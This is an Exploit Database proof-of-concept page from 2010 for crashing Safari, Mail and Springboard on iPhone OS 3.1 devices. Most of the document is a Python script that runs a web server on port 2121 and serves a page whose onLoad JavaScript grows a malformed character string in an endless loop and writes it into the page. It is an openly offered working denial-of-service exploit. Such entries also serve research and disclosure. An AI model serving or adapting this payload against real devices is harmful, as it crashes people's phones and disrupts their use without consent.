iPhone Springboard – Malformed Character Crash (PoC)

• Exploit Database
• 11 阅读

• 作者： Chase Higgins
  日期： 2010-03-15
• 类别：

  • dos
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/11769/

• #!/usr/bin/python
  
  #iPhone Springboard crash PoC by Chase Higgins. Devices tested: iPhone 2G @ OS 3.1, iPhone 3GS @ 3.1.3
  #this script acts as webserver, and causes Safari, as well as Mail and Springboard to crash
  #all these apps crash after running this exploit on the iPhone. Unable to debug any of these processes as the gdb on my 
  #device is acting up, original iPhone is just too low memory to further test this exploit, so I am releasing it
  
  # Exploit Title: iPhone Springboard Malformed Character Crash PoC
  # Date: 3/15/2010
  # Author: Chase Higgins
  # Software Link: apple.com/iphone/
  # Version: iPhone 2G, iPhone 3GS
  # Tested on: iPhone OS 3.1, and iPhone OS 3.1.3
  # CVE : 
  # Code : none
  
  import sys, socket;
  
  def main():
  	html = """
  	<html>
  	<head>
  	<script>
  	function triggerCrash(){
  		evil_div = document.getElementById('evilDiv');
  		var evil_string = "\x4e\x5b\x01";
  		i = 0;
  
  		while (i < 1000){
  			evil_string = evil_string + evil_string;
  		}
  
  		evil_div.innerHTML = evil_string;
  	}
  	</script>
  	</head>
  	<body onLoad="triggerCrash()">
  	<div id="evilDiv">
  	 
  	</div>
  	</body>
  	</html>
  	""";
  
  	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM);
  	s.bind(('',2121));
  	s.listen(1);
  	
  	while True:
  		channel, details = s.accept();
  		print channel.recv(1024);
  		channel.send(html);
  		channel.close();
  	
  main();